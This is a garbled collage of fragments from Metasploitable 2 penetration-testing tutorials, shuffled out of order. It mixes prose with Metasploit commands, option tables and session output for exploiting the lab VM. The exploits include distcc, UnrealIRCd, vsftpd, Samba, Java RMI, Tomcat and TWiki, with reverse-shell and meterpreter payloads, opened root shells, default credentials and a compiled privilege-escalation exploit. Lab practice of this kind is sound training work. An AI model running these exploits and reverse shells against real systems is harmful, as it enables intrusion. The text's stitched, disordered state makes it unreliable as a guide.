Proxies no Use a proxy chain
msf exploit(distcc_exec) > exploit
A test environment provides a secure place to perform penetration testing and security research.
This is about as easy as it gets. [*] A is input
msf exploit(distcc_exec) > show options
This allows remote access to the host for convenience or remote administration. Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'.
This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability.
The interface looks like a Linux command-line shell.
[+] Found netlink pid: 2769
THREADS 1 yes The number of concurrent threads
Backdoors - A few programs and services have been backdoored. Once we get a clear vision on the open ports, we can start enumerating them to see and find the running services alongside their version. If so please share your comments below. In this series of articles we demonstrate how to discover & exploit some of the intentional vulnerabilities within the Metasploitable pentesting target.
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154
PASSWORD no The Password for the specified username
msf exploit(java_rmi_server) > set LHOST 192.168.127.159
Under the Module Options section of the above exploit there were the following commands to run: Note: The show targets & set TARGET steps are not necessary as 0 is the default. msf exploit(java_rmi_server) > set RHOST 192.168.127.154
VHOST no HTTP server virtual host
---- --------------- -------- -----------
This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms.
The default login and password is msfadmin:msfadmin. RHOST yes The target address
Restart the web server via the following command. daemon, whereis nc
The advantage is that these commands are executed with the same privileges as the application. The following sections describe the requirements and instructions for setting up a vulnerable target. root. [*] Matching
payload => cmd/unix/reverse
Type help; or \h for help. First of all, open the Metasploit console in Kali. RPORT 139 yes The target port
[*] Started reverse double handler
The example below uses rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported.
[*] Sending backdoor command
Find what else is out there and learn how it can be exploited.
[*] Accepted the first client connection
[*] Accepted the second client connection
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700
root@ubuntu:~# telnet 192.168.99.131 1524
msf exploit(distcc_exec) > set RHOST 192.168.99.131
[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700
uid=1(daemon) gid=1(daemon) groups=1(daemon)
root@ubuntu:~# smbclient -L //192.168.99.131
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
print$ Disk Printer Drivers
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
msf auxiliary(samba_symlink_traversal) > exploit
The exploit executes /tmp/run, so throw in any payload that you want. To begin using the Metasploit interface, open the Kali Linux terminal and type msfconsole. The risk of the host failing or becoming infected is extremely high.
rapid7/metasploitable3 Wiki. Id Name
RPORT 21 yes The target port
msf exploit(tomcat_mgr_deploy) > show options
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. It is intended to be used as a target for testing exploits with Metasploit.
LHOST yes The listen address
Both operating systems will be running as VMs within VirtualBox. Metasploitable is a Linux virtual machine that is intentionally vulnerable.
From the DVWA home page: "Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
---- --------------- -------- -----------
[*] Writing to socket B
TWiki is a flexible, powerful, secure, yet simple web-based collaboration platform. We have found the following appropriate exploit: TWiki History TWikiUsers rev Parameter Command Execution. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment." Let's go ahead. [*] instance eval failed, trying to exploit syscall
RPORT 23 yes The target port
SESSION => 1
Description. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php.
0 Linux x86
192.168.56/24 is the default "host only" network in Virtual Box.
0 Automatic
Select Metasploitable VM as a target victim from this list. Time for some escalation of local privilege. Module options (exploit/multi/misc/java_rmi_server):
Then, hit the "Run Scan" button in the . msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154
RPORT 1099 yes The target port
Server version: 5.0.51a-3ubuntu5 (Ubuntu). Let's first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have an exposed manager application. msf exploit(unreal_ircd_3281_backdoor) > show options
[*] Accepted the first client connection
[*] Banner: 220 (vsFTPd 2.3.4)
msf exploit(drb_remote_codeexec) > show options
-- ----
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300
[*] udev pid: 2770
An attacker can execute arbitrary OS commands by supplying a rev parameter that includes shell metacharacters to the TWikiUsers script. In the online forums some people think this issue is due to a problem with Metasploit 6, whilst Metasploit 5 does not have this issue.
Now you can do some post-exploitation.
-- ----
[*] Command: echo 7Kx3j4QvoI7LOU5z;
URI yes The dRuby URI of the target host (druby://host:port)
The vulnerabilities identified by most of these tools extend . Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. ---- --------------- ---- -----------
[*] Matching
Exploit target:
NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services. msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
LHOST => 192.168.127.159
RHOST 192.168.127.154 yes The target address
By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. The Rapid7 Metasploit community has developed a machine with a range of vulnerabilities. Alternatively, you can also use VMWare Workstation or VMWare Server. RHOST => 192.168.127.154
Highlighted in red underline is the version of Metasploit. You will need the rpcbind and nfs-common Ubuntu packages to follow along. The VNC service provides remote desktop access using the password password. whoami
There are the following kinds of vulnerabilities in Metasploitable 2: Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. Searching for exploits for Java provided something intriguing: Java RMI Server Insecure Default Configuration Java Code Execution. Step 7: Display all tables in information_schema. Metasploitable 3 is the updated version based on Windows Server 2008. RHOST 192.168.127.154 yes The target address
VHOST no HTTP server virtual host
I've done exploits from Kali Linux on Metasploitable 2, and I want to fix the vulnerabilities I'm exploiting, but all I can find as a solution to these vulnerabilities is using firewalls or filtering ports. What is Metasploit? This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems.
msf auxiliary(smb_version) > run
DVWA contains instructions on the home page and additional information is available at Wiki Pages - Damn Vulnerable Web App. ================
[*] A is input
It aids the penetration testers in choosing and configuring of exploits.
In the current version as of this writing, the applications are. URIPATH no The URI to use for this exploit (default is random)
The Nessus scan showed that the password password is used by the server. This setup included an attacker using Kali Linux and a target using the Linux-based Metasploitable. Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather outdated OWASP Top 10. whoami
USERNAME no The username to authenticate as
RHOST yes The target address
Exploit target:
[*] Writing payload executable (274 bytes) to /tmp/rzIcSWveTb
LHOST => 192.168.127.159
-- ----
It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. -- ----
This must be an address on the local machine or 0.0.0.0
After you have downloaded the Metasploitable 2 file, you will need to unzip the file to see its contents. Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. So all we have to do is use the remote shell program to log in: Last login: Wed May 7 11:00:37 EDT 2021 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686. Start/Stop Stop: Open services.msc.
RPORT 139 yes The target port
Here's a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses a random number generator that produces predictable numbers, making it easier for remote attackers to perform brute-force guessing attacks on cryptographic keys. You can edit any TWiki page. [*] Writing to socket A
msf exploit(distcc_exec) > set payload cmd/unix/reverse
[*] Reading from socket B
It aids the penetration testers in choosing and configuring of exploits. From a security perspective, anything labeled Java is expected to be interesting. Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. Name Current Setting Required Description
msf exploit(vsftpd_234_backdoor) > show payloads
SMBPass no The Password for the specified username
msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
The root directory is shared.
nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz
gcc -m32 8572.c -o 8572
RPORT => 8180
Starting Nmap 6.46 (, msf > search vsftpd
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
[*] Reading from sockets
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Disclosure Date Rank Description
Module options (exploit/multi/misc/java_rmi_server):
This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. Stop the Apache Tomcat 8.0 Tomcat8 service.
URIPATH no The URI to use for this exploit (default is random)
Step 2: Basic Injection.
Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). [*] Started reverse handler on 192.168.127.159:8888
payload => cmd/unix/reverse
Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. Such virtual machines are mainly used for conducting security training, testing security tools, or simply practicing common penetration testing techniques. Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers.
Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary. payload => cmd/unix/reverse
[*] Auxiliary module execution completed
msf > use exploit/unix/webapp/twiki_history
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Name Current Setting Required Description
This document will continue to expand over time as many of the less obvious flaws with this platform are detailed.
When we performed a scan with Nmap during the scanning and enumeration stage, we saw that ports 21, 22 and 23 are open and running FTP, Telnet and SSH.